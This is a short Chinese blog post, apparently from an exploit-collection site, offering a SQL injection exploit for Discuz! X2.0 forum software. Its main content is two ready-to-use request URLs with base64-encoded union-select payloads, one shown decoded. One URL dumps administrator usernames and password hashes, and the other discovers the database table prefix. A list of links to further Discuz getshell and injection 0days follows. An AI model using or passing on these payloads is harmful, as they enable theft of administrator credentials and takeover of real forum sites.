Discuz! X2.0 SQL注入漏洞 EXP

2011, June 29, 3:01 PM. oday收藏
Submitted by admin

程序版本: Discuz! X2

DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where  username like ‘admin|x|y

如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

 
Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 13449, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 13179, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 10755, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 20809, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 45627, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 18587, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 12029, 评论: 0)
dz~~~~马后炮 (浏览: 7404, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 8449, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 14386, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):